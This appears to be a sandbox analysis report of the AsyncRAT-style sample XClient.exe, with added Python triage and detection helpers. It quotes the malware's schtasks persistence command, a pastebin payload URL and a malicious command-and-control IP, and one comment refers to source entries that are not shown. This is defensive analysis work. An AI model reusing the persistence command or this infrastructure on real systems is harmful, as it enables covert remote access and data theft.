Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 7_2_00007FFD9B8906A8 push ebx; retf 7_2_00007FFD9B8906EA
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 9_2_00007FFD9B8B0604 push ebx; retf 9_2_00007FFD9B8B060A
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 9_2_00007FFD9B8B06D8 push ebx; retf 9_2_00007FFD9B8B06EA
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 10_2_00007FFD9B8A05FA push ebx; retf 10_2_00007FFD9B8A060A
Source: C:\Users\user\AppData\Roaming\XClient.exe Code function: 10_2_00007FFD9B8A06D7 push ebx; retf 10_2_00007FFD9B8A06EA
Source: C:\Users\user\Desktop\XClient.exe File created: C:\Users\user\AppData\Roaming\XClient.exe (dropped file)
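The two Messages.cs entries above describe the plugin path: Pack[2] carries the plugin name and Pack[3] a base64 string that Helper.Decompress turns into raw bytes handed to System.AppDomain.Load(byte[]), so a plugin never has to touch disk. The Python below is an added example for analysts, not code from the sample or from this report: it rebuilds that decode chain so a captured Pack[3] value can be triaged instead of loaded, and finishes with the same IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR check the static PE section records for the main binary. Assumptions: Helper.Decompress is GZip (the report does not name the algorithm), and both the Pack message and the MZ/PE stub inside it are constructed here.

```python
import base64
import gzip
import struct

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # data directory index of the CLR header


def fake_managed_pe() -> bytes:
    """Constructed stand-in for a plugin assembly: only the header fields the
    checks below read are populated. It is not a loadable image."""
    buf = bytearray(0x200)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)            # e_lfanew -> PE header at 0x40
    buf[0x40:0x44] = b"PE\0\0"
    opt = 0x40 + 0x18                                   # optional header follows the file header
    struct.pack_into("<H", buf, opt, 0x10B)             # PE32 magic
    struct.pack_into("<I", buf, opt + 0x5C, 16)         # NumberOfRvaAndSizes
    com = opt + 0x60 + IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR * 8
    struct.pack_into("<II", buf, com, 0x2008, 0x48)     # CLR header RVA / size (made up)
    return bytes(buf)


def build_pack(name: str, assembly: bytes) -> list:
    """Constructed 'Pack' message with the layout the report's code indexes:
    Pack[2] is the plugin name, Pack[3] is base64(compressed assembly).
    GZip stands in for Helper.Decompress (assumption)."""
    return ["plugin", "", name, base64.b64encode(gzip.compress(assembly)).decode()]


def decode_pack(pack: list) -> bytes:
    """Convert.FromBase64String(Pack[3]) followed by Helper.Decompress (GZip assumed)."""
    return gzip.decompress(base64.b64decode(pack[3], validate=True))


def pe_header_offset(data: bytes):
    """Offset of the 'PE\\0\\0' signature, or None if this is not a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    if pe + 0x18 + 2 > len(data) or data[pe:pe + 4] != b"PE\0\0":
        return None
    return pe


def has_clr_header(data: bytes) -> bool:
    """True when data directory 14 (COM descriptor) is populated, which is what
    makes the image a managed assembly that AppDomain.Load(byte[]) accepts."""
    pe = pe_header_offset(data)
    if pe is None:
        return False
    opt = pe + 0x18
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:          # PE32
        count_off, dd_off = opt + 0x5C, opt + 0x60
    elif magic == 0x20B:        # PE32+
        count_off, dd_off = opt + 0x6C, opt + 0x70
    else:
        return False
    if count_off + 4 > len(data):
        return False
    count = struct.unpack_from("<I", data, count_off)[0]
    entry = dd_off + IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR * 8
    if count <= IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR or entry + 8 > len(data):
        return False
    rva, size = struct.unpack_from("<II", data, entry)
    return rva != 0 and size != 0


def triage_pack(pack: list) -> dict:
    """Decode a Pack message and report what the client would have loaded."""
    body = decode_pack(pack)
    return {
        "name": pack[2],
        "size": len(body),
        "is_pe": pe_header_offset(body) is not None,
        "is_managed": has_clr_header(body),
    }


if __name__ == "__main__":
    print(triage_pack(build_pack("Demo", fake_managed_pe())))
```

If the real Helper.Decompress turns out not to be GZip, only decode_pack needs changing; the PE and CLR-header checks work on whatever bytes come out, which is the part that tells you whether the payload is another managed module or something else.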

              Boot Survival

Source: C:\Users\user\Desktop\XClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Users\user\Desktop\XClient.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk (2 events)
Source: C:\Users\user\Desktop\XClient.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\XClient.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\XClient.exe Process information set: NOOPENFILEERRORBOX (60 identical events)
Source: C:\Users\user\AppData\Roaming\XClient.exe Process information set: NOOPENFILEERRORBOX (80 identical events)
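The schtasks command line above is the whole persistence story in one event: a task that re-runs every minute (/sc minute /mo 1), asks for the highest run level (/RL HIGHEST), points at a copy of the sample under %APPDATA% (/tr), and is registered by a process running from the user's Desktop; the LNK dropped into the Startup folder is the fallback. The Python below is an added detection example, not part of the report: it parses schtasks command lines from process-creation records and scores exactly those four traits, and flags shortcut creation in the per-user Startup folder. The command line and the LNK path are copied from this report; the second, benign event and all other record fields are constructed.

```python
import re

# Constructed process-creation records. The first command line is the one in
# this report; the second is a made-up benign task for contrast.
PROCESS_EVENTS = [
    {
        "parent": r"C:\Users\user\Desktop\XClient.exe",
        "cmd": r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST '
               r'/sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"',
    },
    {
        "parent": r"C:\Windows\System32\svchost.exe",
        "cmd": r'schtasks.exe /create /sc daily /st 03:00 /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"',
    },
]

# Constructed file-creation paths; the first is the LNK path from this report.
FILE_EVENTS = [
    r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk",
    r"C:\Users\user\Documents\notes.txt",
]

# Locations an unprivileged user can write to. A task action or a task creator
# living there is the signal; schtasks.exe itself is not.
USER_WRITABLE = re.compile(r"\\(AppData|Users\\[^\\]+\\(Desktop|Downloads|Documents))\\", re.I)
STARTUP_LNK = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I)


def tokenize(cmd: str) -> list:
    """Split a Windows command line, keeping quoted arguments intact."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def parse_schtasks(cmd: str) -> dict:
    """Map schtasks switches (lower-cased) to their values; switches without a
    value map to True."""
    toks = tokenize(cmd)
    opts = {}
    i = 1                                   # toks[0] is the executable
    while i < len(toks):
        tok = toks[i]
        if not tok.startswith("/"):
            i += 1
            continue
        if i + 1 < len(toks) and not toks[i + 1].startswith("/"):
            opts[tok.lower()] = toks[i + 1]
            i += 2
        else:
            opts[tok.lower()] = True
            i += 1
    return opts


def score_schtasks(event: dict) -> list:
    """Return the persistence indicators present in one schtasks launch."""
    opts = parse_schtasks(event["cmd"])
    findings = []
    if "/create" not in opts:
        return findings
    if str(opts.get("/sc", "")).lower() == "minute":
        try:
            every = int(opts.get("/mo", 1))     # schtasks treats a missing /mo as 1
        except (TypeError, ValueError):
            every = 1
        if every <= 5:
            findings.append(f"re-runs every {every} minute(s)")
    if str(opts.get("/rl", "")).upper() == "HIGHEST":
        findings.append("asks for the highest run level")
    action = str(opts.get("/tr", ""))
    if USER_WRITABLE.search(action):
        findings.append("task action in a user-writable path: " + action)
    if USER_WRITABLE.search(event["parent"]):
        findings.append("registered by a process in a user-writable path")
    return findings


def is_startup_lnk(path: str) -> bool:
    """Shortcut dropped into the per-user Startup folder."""
    return STARTUP_LNK.search(path) is not None


if __name__ == "__main__":
    for ev in PROCESS_EVENTS:
        print(ev["cmd"], "->", score_schtasks(ev) or "clean")
    for p in FILE_EVENTS:
        print(p, "->", "startup LNK" if is_startup_lnk(p) else "ignore")
```

Treat two or more findings on one event as worth a ticket; a one-minute repetition alone is rare outside malware, but the user-writable action path is the trait that survives a renamed task.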

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\XClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\XClient.exe Memory allocated: 750000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\XClient.exe Memory allocated: 1A580000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 11E0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1AD30000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 760000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1A270000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 16D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1B1B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 23D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1A620000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\XClient.exe Window / User API: threadDelayed 6106
Source: C:\Users\user\Desktop\XClient.exe Window / User API: threadDelayed 3694
Source: C:\Users\user\Desktop\XClient.exe TID: 6532 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 5804 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3052 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3140 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 6596 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: XClient.exe, 00000000.00000002.4116138883.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\XClient.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\XClient.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\XClient.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\XClient.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\XClient.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\XClient.exe Process token adjusted: Debug
Source: C:\Users\user\Desktop\XClient.exe Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\XClient.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
Source: C:\Users\user\Desktop\XClient.exe Queries volume information: C:\Users\user\Desktop\XClient.exe VolumeInformation
Source: C:\Users\user\Desktop\XClient.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe Queries volume information: C:\Users\user\AppData\Roaming\XClient.exe VolumeInformation
Source: C:\Users\user\Desktop\XClient.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\Desktop\XClient.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
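A caveat on the "Thread delayed" and "Thread sleep time" entries above. 922337203685477 ms is 2^63 hundred-nanosecond units, the magnitude of the most negative int64, and that is the relative interval kernel32 hands to NtDelayExecution for Sleep(INFINITE) (what .NET Thread.Sleep(Timeout.Infinite) becomes). These entries therefore record threads parked for good, consistent with a main thread waiting forever while worker threads run, not a finite delay picked to outlast the sandbox, and the per-thread totals are whole multiples of it (TID 6532: 5 x 922337203685477). The "Contains long sleeps" signature fires on them all the same. The Python below is an added triage helper, not part of the report: it splits each reported value into infinite waits plus a timed remainder and only calls the remainder evasion when it reaches the 30 000 ms bound the report itself quotes. The first three input lines are copied from this report; the fourth (a 300 000 ms delay) is constructed to show what a real timed sleep looks like.

```python
import re

# A relative NtDelayExecution interval is a negative count of 100 ns units.
# Sleep(INFINITE) / Thread.Sleep(Timeout.Infinite) is passed as the most
# negative int64, which the report prints as its magnitude in milliseconds.
INFINITE_MS = (1 << 63) // 10_000          # 922337203685477
SANDBOX_THRESHOLD_MS = 30_000              # the ">= -30000s" bound quoted in the report

# Lines 1-3 are copied from this report; line 4 is constructed (5 minutes).
REPORT_LINES = [
    "Source: C:\\Users\\user\\Desktop\\XClient.exe Thread delayed: delay time: 922337203685477",
    "Source: C:\\Users\\user\\Desktop\\XClient.exe TID: 6532 Thread sleep time: -4611686018427385s >= -30000s",
    "Source: C:\\Users\\user\\AppData\\Roaming\\XClient.exe TID: 5804 Thread sleep time: -922337203685477s >= -30000s",
    "Source: C:\\Users\\user\\Desktop\\XClient.exe Thread delayed: delay time: 300000",
]

_PAT = re.compile(r"(delay time|sleep time): -?(\d+)")


def classify_delay(ms: int) -> dict:
    """Split a reported value into whole infinite waits and a timed remainder.
    'Thread sleep time' lines are per-thread totals, so several infinite
    waits can be stacked in one number (5 of them for TID 6532)."""
    infinite, timed = divmod(ms, INFINITE_MS)
    return {"infinite_waits": infinite, "timed_ms": timed}


def is_timed_evasion(ms: int) -> bool:
    """Only a finite delay at or above the sandbox threshold is evidence of
    sleeping to outlast analysis; a parked thread is not."""
    return classify_delay(ms)["timed_ms"] >= SANDBOX_THRESHOLD_MS


def parse_report_lines(lines) -> list:
    """Pull every delay value out of report-style lines and classify it."""
    out = []
    for line in lines:
        m = _PAT.search(line)
        if not m:
            continue
        ms = int(m.group(2))
        entry = classify_delay(ms)
        entry.update(kind=m.group(1), ms=ms, timed_evasion=is_timed_evasion(ms))
        out.append(entry)
    return out


if __name__ == "__main__":
    for e in parse_report_lines(REPORT_LINES):
        print(e)
```

The WMI queries that follow (Win32_VideoController, AntivirusProduct) and the MachineGuid read are the parts of this section that actually profile the host; the sleep entries are mostly the client's idle threads.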

              Stealing of Sensitive Information

Source: Yara match File source: XClient.exe, type: SAMPLE
Source: Yara match File source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4114219369.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XClient.exe PID: 6884, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED

              Remote Access Functionality

Source: Yara match File source: XClient.exe, type: SAMPLE
Source: Yara match File source: 0.0.XClient.exe.210000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.4114219369.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: XClient.exe PID: 6884, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
MITRE ATT&CK Matrix

Techniques are listed per tactic column. A leading number is the count badge shown in that matrix cell; entries without a number are matrix cells with no hit.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 11 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 1 DLL Side-Loading; 11 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 11 Obfuscated Files or Information; 2 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 131 Virtualization/Sandbox Evasion; 11 Process Injection
Credential Access: 1 Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 1 File and Directory Discovery; 13 System Information Discovery; 1 Query Registry; 211 Security Software Discovery; 1 Process Discovery; 131 Virtualization/Sandbox Evasion; 1 Application Window Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: 11 Archive Collected Data; 1 Input Capture; 1 Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: 1 Web Service; 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Antivirus / Scanner results: initial sample

Source | Detection | Scanner | Label | Link
XClient.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
XClient.exe | 68% | Virustotal | | Browse
XClient.exe | 100% | Avira | TR/Spy.Gen |
XClient.exe | 100% | Joe Sandbox ML | |

Antivirus / Scanner results: dropped files

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\XClient.exe | 100% | Avira | TR/Spy.Gen |
C:\Users\user\AppData\Roaming\XClient.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\XClient.exe | 74% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT |
C:\Users\user\AppData\Roaming\XClient.exe | 68% | Virustotal | | Browse

No Antivirus matches
No Antivirus matches
No Antivirus matches
Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pastebin.com | 172.67.19.24 | true | false | | high

URLs

Name | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/c8qJf1m5 | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | XClient.exe, 00000000.00000002.4114219369.0000000002581000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
172.67.19.24 | pastebin.com | United States | | 13335 | CLOUDFLARENETUS | false
87.120.125.47 | unknown | Bulgaria | | 25206 | UNACS-AS-BG8000BurgasBG | true
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1583745
                    Start date and time:2025-01-03 14:06:04 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 6m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:11
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:XClient.exe
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@8/3@1/2
                    EGA Information:
                    • Successful, ratio: 20%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 37
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.253.45
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Execution Graph export aborted for target XClient.exe, PID 2132 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 3592 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 5180 because it is empty
                    • Execution Graph export aborted for target XClient.exe, PID 6496 because it is empty
• Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
08:07:05 | API Interceptor | 13854016x Sleep call for process: XClient.exe modified
13:06:59 | Task Scheduler | Run new task: XClient path: C:\Users\user\AppData\Roaming\XClient.exe
13:06:59 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
172.67.19.24 | rrats.exe | Get hash | malicious | AsyncRAT | Browse | pastebin.com/raw/KKpnJShN
 | sys_upd.ps1 | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
 | cr_asm_menu..ps1 | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
 | cr_asm2.ps1 | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
 | cr_asm_phshop..ps1 | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
 | VvPrGsGGWH.exe | Get hash | malicious | AsyncRAT, XWorm | Browse | pastebin.com/raw/sA04Mwk2
 | HQsitBLlOv.dll | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
 | xK44OOt7vD.exe | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
 | steamcodegenerator.exe | Get hash | malicious | Unknown | Browse | pastebin.com/raw/sA04Mwk2
 | cr_asm_hiddenz.ps1 | Get hash | malicious | AsyncRAT, XWorm | Browse | pastebin.com/raw/sA04Mwk2

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
pastebin.com | ogVinh0jhq.exe | Get hash | malicious | DCRat | Browse | 104.20.4.235
 | hiwA7Blv7C.exe | Get hash | malicious | Xmrig | Browse | 172.67.19.24
 | CRf9KBk4ra.exe | Get hash | malicious | DCRat | Browse | 172.67.19.24
 | dF66DKQP7u.exe | Get hash | malicious | XWorm | Browse | 104.20.3.235
 | 2QaN4hOyJs.exe | Get hash | malicious | XWorm | Browse | 104.20.3.235
 | bad.txt | Get hash | malicious | AsyncRAT | Browse | 104.20.3.235
 | dlhost.exe | Get hash | malicious | XWorm | Browse | 104.20.4.235
 | htkeUc1zJ0.exe | Get hash | malicious | Unknown | Browse | 104.20.4.235
 | c2.exe | Get hash | malicious | Xmrig | Browse | 104.20.4.235
 | Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | Get hash | malicious | Unknown | Browse | 172.67.19.24

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
UNACS-AS-BG8000BurgasBG | file.exe | Get hash | malicious | DcRat, JasonRAT | Browse | 87.120.113.91
 | 009274965.lnk | Get hash | malicious | DarkVision Rat | Browse | 87.120.113.91
 | hoEtvOOrYH.exe | Get hash | malicious | SmokeLoader | Browse | 87.120.115.216
 | rebirth.arm4t.elf | Get hash | malicious | Gafgyt | Browse | 87.120.113.63
 | rebirth.spc.elf | Get hash | malicious | Gafgyt | Browse | 87.120.113.63
 | rebirth.sh4.elf | Get hash | malicious | Gafgyt | Browse | 87.120.113.63
 | rebirth.arm5.elf | Get hash | malicious | Gafgyt | Browse | 87.120.113.63
 | rebirth.x86.elf | Get hash | malicious | Gafgyt | Browse | 87.120.113.63
 | rebirth.ppc.elf | Get hash | malicious | Gafgyt | Browse | 87.120.113.63
 | rebirth.arm6.elf | Get hash | malicious | Gafgyt | Browse | 87.120.113.63
CLOUDFLARENETUS | 7z91gvU.exe | Get hash | malicious | LummaC | Browse | 104.21.96.1
 | https://telegra.ph/Clarkson-122025-01-02 | Get hash | malicious | Unknown | Browse | 104.26.13.205
 | mode11_0HVJ.exe | Get hash | malicious | CobaltStrike | Browse | 188.114.96.3
 | https://goatstuff.sbs/re5.mp4 | Get hash | malicious | Unknown | Browse | 188.114.96.3
 | mode11_AKUh.exe | Get hash | malicious | CobaltStrike | Browse | 188.114.96.3
 | mode11_qLf2.exe | Get hash | malicious | CobaltStrike | Browse | 188.114.97.3
 | mode11_UVo6.exe | Get hash | malicious | CobaltStrike | Browse | 188.114.96.3
 | mode11_buqd.exe | Get hash | malicious | CobaltStrike | Browse | 188.114.96.3
 | mode11_N1Fz.exe | Get hash | malicious | CobaltStrike | Browse | 188.114.96.3
 | http://t1.awagama2.org | Get hash | malicious | Unknown | Browse | 188.114.96.3

Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | 1111.hta | Get hash | malicious | Unknown | Browse | 172.67.19.24
 | qwertyuiopasdfghjklzxcvbnm.hta | Get hash | malicious | Unknown | Browse | 172.67.19.24
 | W2k2NLSvja.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 172.67.19.24
 | FACT0987789000900.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 172.67.19.24
 | 2Mi3lKoJfj.exe | Get hash | malicious | Quasar | Browse | 172.67.19.24
 | RFQ-12202431_ACD_Group.pif.exe | Get hash | malicious | Unknown | Browse | 172.67.19.24
 | RFQ-12202431_ACD_Group.pif.exe | Get hash | malicious | Unknown | Browse | 172.67.19.24
 | ogVinh0jhq.exe | Get hash | malicious | DCRat | Browse | 172.67.19.24
 | Sylacauga AL License.msg | Get hash | malicious | Unknown | Browse | 172.67.19.24
                    No context
                    Process:C:\Users\user\AppData\Roaming\XClient.exe
                    File Type:CSV text
                    Category:dropped
                    Size (bytes):654
                    Entropy (8bit):5.380476433908377
                    Encrypted:false
                    SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                    MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                    SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                    SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                    SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                    Malicious:true
                    Reputation:moderate, very likely benign file
